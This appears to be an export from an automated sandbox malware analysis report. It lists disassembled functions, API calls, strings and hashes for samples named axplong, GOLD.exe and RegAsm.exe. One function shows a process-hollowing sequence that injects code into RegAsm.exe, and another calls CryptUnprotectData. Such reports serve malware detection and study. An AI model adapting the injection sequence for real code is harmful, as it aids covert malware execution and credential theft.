__Mtx_destroy_in_situ.LIBCPMT ref: 005D7971

Strings

@y], xrefs: 005D794A

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: @y]
API String ID: 4078500453-1694284580
Opcode ID: 9656207982b0ce2b6d28872b327e9b47d13c60a4e28b8bb1e270314695dd6476
Instruction ID: fcddb741231352c0983e950bc82b9676229e57c01766130171486bce9c9954f2
Opcode Fuzzy Hash: 9656207982b0ce2b6d28872b327e9b47d13c60a4e28b8bb1e270314695dd6476
Instruction Fuzzy Hash: 5B31A2B29047099FD730DF68D849A6ABBE8FB58310F100A2FE545C7342E771EA5487A1

Function 005C2AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C2B23

Strings

P#\, xrefs: 005C2B18
This function cannot be called on a default constructed task, xrefs: 005C2B03
P#\, xrefs: 005C2B2E

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#\$P#\$This function cannot be called on a default constructed task
API String ID: 2659868963-3752511798
Opcode ID: f7a2706bc6b78b95c1e534500d8af8d6953c047231d714367a1b3cf5c95dacda
Instruction ID: f15c9619e087a8e66709bb7c55ee3c436b239a28590793187a0df2e828cc0028
Opcode Fuzzy Hash: f7a2706bc6b78b95c1e534500d8af8d6953c047231d714367a1b3cf5c95dacda
Instruction Fuzzy Hash: 5CF0C27091030EABC720DFA898419DABFEAAF45300F1041AEF90497301EBB0AA84CB94

Function 005FC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005FCA37

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: b97db40080842dea1ecba0a44dfc5aaa5f2d73980e43a9f6419118e47bbc44f5
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 1BB1253290028E9FDB15CF28C9817BEBFE5FF95340F1485BADA95AB241D6389D41CB60

Function 005DBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 005DBAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 005DBB14
_xtime_get.LIBCPMT ref: 005DBB37
__Xtime_diff_to_millis2.LIBCPMT ref: 005DBB43

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 50349e8fdacae33716998c83a979a952586735b0a31bfacd087a2106d8a6aea5
Instruction ID: 6d3e00a60c0badb52d33eabe0822ff7387e9e56611558b5bd601597f7d46c854
Opcode Fuzzy Hash: 50349e8fdacae33716998c83a979a952586735b0a31bfacd087a2106d8a6aea5
Instruction Fuzzy Hash: 9D21FB71A0111AAFDF21EBA8D8459AEBFB9FF48714F104067F501A7351DB70AE418BA1

Function 005D7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 005D726C

Strings

`z], xrefs: 005D7282
@.\, xrefs: 005D7250

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.\$`z]
API String ID: 3366076730-3199181815
Opcode ID: cf6406562b0397d452d131cf354f22a5adffe29f920a1f52a1ad72644e8a26e4
Instruction ID: 2d7f79eaa7fad0a948f63bcdc9a09250e70ac95341f0f573c19291bec267ed0a
Opcode Fuzzy Hash: cf6406562b0397d452d131cf354f22a5adffe29f920a1f52a1ad72644e8a26e4
Instruction Fuzzy Hash: 95A136B4A01619CFDB21CFA8C884B9EBBF1BF48710F19815AE819AB351E7759D41CF90

Function 005D8E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

P#\, xrefs: 005C2486
P#\, xrefs: 005C246D

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: P#\$P#\
API String ID: 0-1576673276
Opcode ID: 9593442ef2b5336f8d578e62f1b8d897f8942894690f1e2ef10492b8abcb7112
Instruction ID: c19d1ea54ce9cf953d2e2cf5d59d33ecdb2ea02d57ac6e2e52da9472ae5b2a3f
Opcode Fuzzy Hash: 9593442ef2b5336f8d578e62f1b8d897f8942894690f1e2ef10492b8abcb7112
Instruction Fuzzy Hash: 9651D87290010A9BDF24DFACDC45A6EBBA9FF84310B14066BF915DB341EB30EE508791

Function 005FF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 005FF263

Strings

8"b, xrefs: 005FF30B
`'b, xrefs: 005FF235

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"b$`'b
API String ID: 3903695350-2978542851
Opcode ID: f305e903c31e6453a5f27f2e1963b2b5f78ad22ae9e0e5585f1f8eb01acc3314
Instruction ID: 2fd3e312ae7314aa68794b887196e1ba5584ec1a4802bf8a049e9abe551d871b
Opcode Fuzzy Hash: f305e903c31e6453a5f27f2e1963b2b5f78ad22ae9e0e5585f1f8eb01acc3314
Instruction Fuzzy Hash: 6D314F7560020E9FDB21AB78DD49B7A7BE9BF40350F104839F64AD7592DE39AC408B12

Function 005C3930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 005C3962
__Mtx_init_in_situ.LIBCPMT ref: 005C39A1

Strings

pB\, xrefs: 005C3940

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB\
API String ID: 3366076730-186810650
Opcode ID: 4d17b50ff0b4213d5366d59e60e2f31666563645ba0a7a07eee68aee019732ad
Instruction ID: 3d9a73a8932ff2947b4c6fb29989043959b8482c5cde4d047d6569bbb483f0be
Opcode Fuzzy Hash: 4d17b50ff0b4213d5366d59e60e2f31666563645ba0a7a07eee68aee019732ad
Instruction Fuzzy Hash: FF4136B45017058FD720CF58C988B5ABBF1FF84315F14861EE86A8B351E7B4EA15CB80

Function 005C2440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C247E

Strings

P#\, xrefs: 005C2486
P#\, xrefs: 005C246D

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#\$P#\
API String ID: 2659868963-1576673276
Opcode ID: e4e176fddc36388a975fd0d3343053cd110947f87b25016c31f045d185c9808a
Instruction ID: 2d99ff42f8fe3a17e8f7773fc9ccaf797497f7f16773f10e44677134a5cc868e
Opcode Fuzzy Hash: e4e176fddc36388a975fd0d3343053cd110947f87b25016c31f045d185c9808a
Instruction Fuzzy Hash: 58F0E5B191020D6BDB14FFE4D805D89BBADEE55700B008A26F744E7901FBB0FA848BD1

Function 005C2520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C2552

Strings

P#\, xrefs: 005C255D
P#\, xrefs: 005C2547

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#\$P#\
API String ID: 2659868963-1576673276
Opcode ID: f94514fd45a10cffaceff02fcfcc0e888a7bd79777c46e7eed65a5150ef02a17
Instruction ID: eda624d319d69e40f14c91805d6a823aac50b7e958cc4f8d3ede51877c157375
Opcode Fuzzy Hash: f94514fd45a10cffaceff02fcfcc0e888a7bd79777c46e7eed65a5150ef02a17
Instruction Fuzzy Hash: 05F0E270D0020EABCB14DF68D8409CEBFF5AF45300F1082AEE404A7200EA705A95CB94

Analysis Process: GOLD.exePID: 8164, Parent PID: 7944COMMON

Execution Graph

Execution Coverage:	28.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 024D254D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024D24BF,024D24AF), ref: 024D26BC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024D26CF
Wow64GetThreadContext.KERNEL32(000002EC,00000000), ref: 024D26ED
ReadProcessMemory.KERNELBASE(000002F0,?,024D2503,00000004,00000000), ref: 024D2711
VirtualAllocEx.KERNELBASE(000002F0,?,?,00003000,00000040), ref: 024D273C
WriteProcessMemory.KERNELBASE(000002F0,00000000,?,?,00000000,?), ref: 024D2794
WriteProcessMemory.KERNELBASE(000002F0,00400000,?,?,00000000,?,00000028), ref: 024D27DF
WriteProcessMemory.KERNELBASE(000002F0,049564C4,?,00000004,00000000), ref: 024D281D
Wow64SetThreadContext.KERNEL32(000002EC,04960000), ref: 024D2859
ResumeThread.KERNELBASE(000002EC), ref: 024D2868

Strings

VirtualAllocEx, xrefs: 024D264D
WriteProcessMemory, xrefs: 024D2660
GetP, xrefs: 024D25CF
VirtualAlloc, xrefs: 024D2614
ResumeThread, xrefs: 024D2689
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 024D26BB
ress, xrefs: 024D25D7
TerminateProcess, xrefs: 024D274B
SetThreadContext, xrefs: 024D2673
aryA, xrefs: 024D2593
ReadProcessMemory, xrefs: 024D263A
Load, xrefs: 024D258B
CreateProcessA, xrefs: 024D2601
GetThreadContext, xrefs: 024D2627

Memory Dump Source

Source File: 00000013.00000002.1885147887.00000000024D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_24d2000_GOLD.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 1cdf44bcbe397e01ede66d846f4f0e5b51bcfd775a64b8f736120a14cb2ca946
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 2BB1E57660064AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB342D774FA41CB94

Function 009F1000 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 009F1082

Memory Dump Source

Source File: 00000013.00000002.1884933735.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_9f0000_GOLD.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8b604ad1b05e14d2172ed5fd40202045a9674653841b9bc28ca7d9f862945308
Instruction ID: 3f542859f9c87451947fbdc457aabea93c7472f5742de9298284c9503ab94dd2
Opcode Fuzzy Hash: 8b604ad1b05e14d2172ed5fd40202045a9674653841b9bc28ca7d9f862945308
Instruction Fuzzy Hash: 4F2104B1D0125D9BDB10DFAAC884BEEFBB4FB48310F54852AE918A7240C7755951CBE4

Function 009F1008 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 009F1082

Memory Dump Source

Source File: 00000013.00000002.1884933735.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_9f0000_GOLD.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c8f0319003ab676799627bdc830be8c640c9d2e56c4788f7ab765548a4442d82
Instruction ID: 52b12efb3278311f33a8614332a93caf9ec964a37539d85e64c5be0c7bfd8819
Opcode Fuzzy Hash: c8f0319003ab676799627bdc830be8c640c9d2e56c4788f7ab765548a4442d82
Instruction Fuzzy Hash: CC2104B1D0125D9BDB10DFAAC884BEEFBB8FB48310F50852AE918A7240C7755950CBA4

Analysis Process: RegAsm.exePID: 2020, Parent PID: 8164COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	112
Total number of Limit Nodes:	16

Executed Functions

Function 06470D80 Relevance: 20.6, Strings: 16, Instructions: 618
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06470E02
$q, xrefs: 06470F36
$q, xrefs: 06470E78
$q, xrefs: 06470F86
$q, xrefs: 064713A0
$q, xrefs: 06470FAC
$q, xrefs: 06471430
$q, xrefs: 064713AC
$q, xrefs: 06471336
$q, xrefs: 06471461
$q, xrefs: 06470E84
$q, xrefs: 0647137B
$q, xrefs: 06471455
$q, xrefs: 06470E52
$q, xrefs: 06470FB8
$q, xrefs: 064713EB

Memory Dump Source

Source File: 00000014.00000002.2103456932.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6470000_RegAsm.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-2144323406
Opcode ID: a5f51d36ed636e10057f7c026bca016c1bb404f2f8fbea1d3f3368fc974f5fb9
Instruction ID: adae9bad86df80cd942fed26ad6edf0c5753fb7bfaf62cffd8efb2a4367cce91
Opcode Fuzzy Hash: a5f51d36ed636e10057f7c026bca016c1bb404f2f8fbea1d3f3368fc974f5fb9
Instruction Fuzzy Hash: F222A130B002059FEB559B65C944AAEBBF6FF89700B19846AE506DB3A6DF70DC01CB91

Function 09369410 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0936947D

Strings

E>y, xrefs: 09369432

Memory Dump Source

Source File: 00000014.00000002.2121221567.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_9360000_RegAsm.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: E>y
API String ID: 834300711-3370831285
Opcode ID: f42e0f21d70f107e1eb29fd8810d9d86c8eac51c0798b6443131b24fd1635007
Instruction ID: 31f9a223d8e169500fdaf08ba3c79166562ab6a0fb641f16e18ba17c323eb627
Opcode Fuzzy Hash: f42e0f21d70f107e1eb29fd8810d9d86c8eac51c0798b6443131b24fd1635007
